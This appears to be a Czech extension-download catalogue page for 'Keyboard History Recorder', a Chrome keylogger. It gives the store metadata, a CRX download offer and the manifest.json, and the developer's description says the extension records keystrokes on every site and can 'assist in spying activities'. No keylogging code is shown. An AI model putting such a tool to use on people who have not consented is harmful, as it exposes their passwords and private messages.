Keyboard History Recorder

Keyboard History Recorder is an online Monitoring tool that helps you record the keystrokes

Co je Keyboard History Recorder?

Keyboard History Recorder je rozšíření Chrome vyvinuté tackker, a jeho hlavní funkcí je „Keyboard History Recorder is an online Monitoring tool that helps you record the keystrokes“.

Snímky obrazovky rozšíření

screenshot
screenshot

Stáhnout soubor CRX rozšíření Keyboard History Recorder

Stáhněte si soubory rozšíření Keyboard History Recorder ve formátu crx, ručně nainstalujte rozšíření Chrome do prohlížeče nebo sdílejte soubory crx s přáteli, abyste jednoduše nainstalovali rozšíření Chrome.

Pokyny pro Použití Rozšíření

                        Keyboard History Recorder helps monitoring on browser activity and can also assist in spying activities. This extension records keystrokes on all websites. 

Keyboard History Recorder collects your click stream browsing activity - anonymously, for the purpose of analyzing and ensuring the keylogger is running smoothly.                    

Základní Informace o Rozšíření

Název Keyboard History Recorder Keyboard History Recorder
ID igbodamhgjohafcenbcljfegbipdfjpk
Oficiální URL https://chromewebstore.google.com/detail/keyboard-history-recorder/igbodamhgjohafcenbcljfegbipdfjpk
Popis Keyboard History Recorder is an online Monitoring tool that helps you record the keystrokes
Velikost souboru 240 KB
Počet instalací 3,139
Aktuální Verze 2.1
Poslední Aktualizace 2023-10-04
Datum Vydání 2021-02-06
Hodnocení 5.00/5 Celkem 2 Hodnocení
Vývojář tackker
E-mail [email protected]
Typ Platby free
Podporované Jazyky en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Keyboard History Recorder",
    "description": "Keyboard History Recorder is an online Monitoring tool that helps you record the keystrokes",
    "version": "2.1",
    "icons": {
        "128": "keyboard_history_recorder.png",
        "48": "keyboard_history_recorder.png",
        "16": "keyboard_history_recorder.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}